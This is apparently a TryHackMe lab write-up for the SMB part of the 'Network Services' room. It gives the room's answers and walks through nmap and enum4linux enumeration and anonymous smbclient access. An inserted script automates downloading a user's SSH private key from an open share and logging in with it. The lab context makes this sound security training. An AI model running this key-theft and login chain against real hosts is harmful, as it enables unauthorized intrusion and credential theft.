TryHackMe — Network Services

onlinejudge95
5 min read · Dec 8, 2020

To the uninitiated, TryHackMe is an online platform where you can learn, practice and challenge yourself in the area of cyber-security. A full introduction would need a story of its own, so explore it if you are interested.

I am currently enrolled in the Complete Beginner learning path, and trust me, it has turned cyber-security for me from a shady, dark movie cult into an actual branch of engineering that uses practices as rigorous as those of any other discipline of Computer Science & Engineering. This is a writeup in which I will walk through the room Network Services. I won’t repeat the theory unless absolutely required, as TryHackMe rooms do a pretty great job at that, so without further ado let’s start.

Task1 Get Connected

Like most TryHackMe rooms, the first task gives a brief summary of what to expect and what the prerequisites are. This is the point to set up your VPN connection, because every later task needs network access to the deployed target machine.

Task2 Understanding SMB

The section sports a 10k ft overview of what SMB is. We need not master SMB for this room, but it is still worth reading up on how the protocol actually works, in more depth than the room presents it.

Q1 What Does SMB stands for?
SERVER MESSAGE BLOCK

Q2 What type of protocol is SMB?
RESPONSE-REQUEST

Q3 What do clients connect to server using?
TCP/IP

Q4 What systems does Samba runs on?
UNIX

Task3 Enumerating SMB

Now, this task is where the practical challenges start. Before you go further you should be familiar with nmap, as it is used heavily here and in the later sections; if you haven’t done the Nmap room yet, it is a good idea to practice it first. On Linux (which you definitely should be using) you have one more tool at your disposal, enum4linux, a Perl wrapper around the Samba client tools that pulls workgroup, OS, user and share information out of a Windows or Samba host.

Before moving ahead, make sure you are connected to the VPN and have deployed the target machine. I prefer using my own VM over the AttackBox provided by TryHackMe, but go with whichever setup you prefer.

Q1 Conduct a nmap scan of your choosing, How many ports are open?
3
When it comes to counting open ports I always prefer to start with the fastest timing template. To solve this I used the following

sudo nmap -v -sS -T5 MACHINE_IP

Host discovery succeeded here; had the target not answered nmap’s probes we would have needed -Pn to skip it and scan anyway. I am using a fast timing template since this is just a tutorial, but in real life I would prefer slower templates for better accuracy. -sS (SYN scan) is the sensible default whenever you have root: it never completes the TCP handshake, so it is faster and leaves fewer traces in application logs than a full-connect (-sT) scan. Do not mistake it for IDS evasion, though; any modern IDS sees half-open scans just fine.

Q2 What ports is SMB running on?
139/445
I will be frank: I was not able to understand this question properly, and I assumed the answer was of the format PORT/TCP. I cleared up this bad assumption on the TryHackMe Discord, where a mod told me that the answer format is

there are 2 ports separated by a /

With that cleared up, I went back to the output of my previous scan and picked out the two ports.
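As an added example, not part of the original writeup: once a scan has been saved in nmap’s greppable format (-oG), the two answers above can be pulled out with a small script instead of reading the output by eye, using the service names nmap assigns to the SMB ports (netbios-ssn for 139, microsoft-ds for 445). The scan text it parses is a constructed -oG sample (IP, ports and services invented for the example), not output captured from the room; the functions read -oG text on stdin.

```shell
#!/bin/sh
# Added example, not from the original writeup: count open ports and find the
# SMB ports from nmap greppable output (-oG) instead of eyeballing the scan.
#
# Produce real input with:   sudo nmap -sS -T4 -oG scan.gnmap MACHINE_IP
# The text below is a CONSTRUCTED -oG sample (IP, ports and services invented
# for this example), not output captured from the room.
TAB=$(printf '\t')
SAMPLE_GNMAP="# Nmap 7.80 scan initiated (constructed sample)
Host: 10.10.10.2 ()${TAB}Status: Up
Host: 10.10.10.2 ()${TAB}Ports: 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8080/closed/tcp//http-proxy///${TAB}Ignored State: filtered (996)
# Nmap done (constructed sample)"

# Print "port proto service" for every open port in -oG text read on stdin.
# -oG fields are tab-separated; each port entry is port/state/proto/owner/service/...
open_ports() {
    awk -F'\t' '
        /Ports: / {
            for (i = 1; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, entry, /, /)
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    if (f[2] == "open") print f[1], f[3], f[5]
                }
            }
        }'
}

# Q1: number of open ports.
count_open_ports() {
    open_ports | wc -l | tr -d ' '
}

# Q2: open ports whose service is SMB, joined in the room's "139/445" format.
smb_ports() {
    open_ports | awk '
        $3 == "netbios-ssn" || $3 == "microsoft-ds" { out = out (out ? "/" : "") $1 }
        END { print out }'
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$SAMPLE_GNMAP" | open_ports
echo "open ports: $(printf '%s\n' "$SAMPLE_GNMAP" | count_open_ports)"   # -> 3
echo "SMB on: $(printf '%s\n' "$SAMPLE_GNMAP" | smb_ports)"              # -> 139/445
```

Feed a real file with `open_ports < scan.gnmap`; closed and filtered ports are dropped by the state check, which is exactly the distinction the "how many ports are open?" question turns on.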

Q3 Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
WORKGROUP

First make sure enum4linux is installed. On Kali it is packaged (sudo apt install enum4linux); otherwise clone the script from its GitHub repository. Either way it relies on the Samba client tools being present on your system, so install those as well:

sudo apt install smbclient

Then run the script with -a, which performs all of the basic enumeration (users, shares, groups, password policy and OS information) in one go:

./enum4linux.pl -a MACHINE_IP

For the workgroup, look at the section of the output headed
Enumerating Workgroup/Domain on MACHINE_IP

Q4 What comes up as the name of the machine?
POLOSMB

Q5 What operating system version is running?
6.1

Both of these come from the following section of the enum4linux output
OS information on MACHINE_IP

Q6 What share sticks out as something we might want to investigate?
profiles
A share named profiles most likely holds user profile directories. That makes it worth investigating: if it is readable, it can expose files such as SSH keys, shell histories or saved credentials that let you act as that user on the host.

Task4 Exploiting SMB

This task is the final part of the SMB section: rather than a software exploit, it abuses a configuration weakness (a share that permits anonymous access) and uses smbclient to turn that into a foothold on the host.

Q1 What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
SMB’s default port is 445 (SMB directly over TCP); 139 is the older NetBIOS session service. smbclient connects to 445 unless told otherwise, so -p 445 is what “on the default port” asks for.

Q2 Does the share allow anonymous access? Y/N?
Y
To answer this, check whether the share on the target accepts an anonymous (null) session:

smbclient //MACHINE_IP/profiles -U anonymous -p 139

The command prompts for a password, but an empty one is accepted and you land at the smb: \> prompt, which is an smbclient session on the share rather than a shell on the host. Passing -N instead of -U anonymous skips the password prompt entirely.

Q3 Who can we assume this profile folder belongs to?
John Cactus

Q4 What service has been configured to allow him to work from home?
ssh
Now, these two are not so straightforward. First we need to log in as the anonymous user and look for anything that ties the share back to a person. After logging in and running ls, one file stands out, Working From Home Information.txt, which we can download to our local box with

get "Working From Home Information.txt" FlaggedFile.txt

Now you can exit and do a

cat FlaggedFile.txt

and read the answers to both questions from it.

Q5 What directory on the share should we look in?
.ssh
This is expected: OpenSSH keeps a user’s keys in ~/.ssh, and the profile share exposes that directory. If we can download a user’s private key we can authenticate as that user.

Q6 Which of these keys is most useful to us?
id_rsa
id_rsa is the default file name ssh-keygen (which ships with OpenSSH on most Linux distributions) gives an RSA private key; the matching public key is id_rsa.pub. Since the private key is what sshd’s public-key authentication checks against, it is the file that gets us in.

Q7 What is the smb.txt flag?
<FLAG>
We have already done the groundwork. From the smbclient session, move into the .ssh directory and get both id_rsa and id_rsa.pub to the local box. The comment at the end of id_rsa.pub is normally user@host, so its first part gives the username to log in with. Before using the private key, restrict its permissions with chmod 600 id_rsa; otherwise ssh refuses it as an unprotected key file. Then use the key as the identity file:

ssh -i id_rsa cactus@MACHINE_IP

Now cat smb.txt in the home directory and you have the flag.
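The whole Task 4 chain (check anonymous access, pull the profile’s files and SSH key, fix the key’s permissions, log in and read the flag), as an added example script that is not from the original writeup. It uses smbclient’s -N (no password) and -c (run commands, semicolon-separated) options. The share name, profile folder path and flag file name are assumptions taken from the room’s answers, the key comment is assumed to be user@host, and the network steps only run when SMB_TARGET is set, so the helpers can be exercised offline.

```shell
#!/bin/sh
# Added example, not from the original writeup: the Task 4 chain as a script.
# Assumptions (from the room's answers, not verified here): share "profiles",
# profile folder "John Cactus", flag file smb.txt in the user's home, and an
# OpenSSH public-key comment of the form user@host.

# Return 0 if the share accepts a null (anonymous, empty-password) session.
smb_anonymous_ok() {        # $1 host, $2 share
    smbclient -N "//$1/$2" -c 'ls' >/dev/null 2>&1
}

# Fetch one file from the share into the current directory. The remote name is
# quoted so paths with spaces ("Working From Home Information.txt") work.
smb_fetch() {               # $1 host, $2 share, $3 remote path, $4 local name
    smbclient -N "//$1/$2" -c "get \"$3\" \"$4\""
}

# Username from the comment field of an OpenSSH public key (user@host -> user).
key_user_from_pub() {       # $1 path to id_rsa.pub
    awk '{ print $NF }' "$1" | cut -d@ -f1
}

# OpenSSH refuses a private key readable by others ("UNPROTECTED PRIVATE KEY
# FILE!"), so lock it down to owner read/write before use.
prepare_key() {             # $1 path to private key
    chmod 600 "$1"
}

run_chain() {               # $1 target IP
    host=$1
    share=profiles
    profile=${SMB_PROFILE:-"John Cactus"}   # assumed folder name inside the share
    if ! smb_anonymous_ok "$host" "$share"; then
        echo "no anonymous access to //$host/$share" >&2
        return 1
    fi
    smb_fetch "$host" "$share" "$profile/Working From Home Information.txt" wfh.txt
    smb_fetch "$host" "$share" "$profile/.ssh/id_rsa"     id_rsa
    smb_fetch "$host" "$share" "$profile/.ssh/id_rsa.pub" id_rsa.pub
    prepare_key id_rsa
    user=$(key_user_from_pub id_rsa.pub)
    ssh -i id_rsa -o StrictHostKeyChecking=accept-new "$user@$host" 'cat smb.txt'
}

if [ -n "${SMB_TARGET:-}" ]; then
    run_chain "$SMB_TARGET"
else
    echo "set SMB_TARGET=<MACHINE_IP> to run the chain against the room's target" >&2
fi
```

Run it as `SMB_TARGET=MACHINE_IP sh smb_chain.sh`. The anonymous check is the decision point: if the null session is refused the script stops before downloading anything, which is the same Y/N question the room asks first.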

With this we have finished the SMB exploitation task. I hope you guys find it interesting; please share any feedback. I will be posting the rest of the tasks in separate posts.

Happy hacking!!
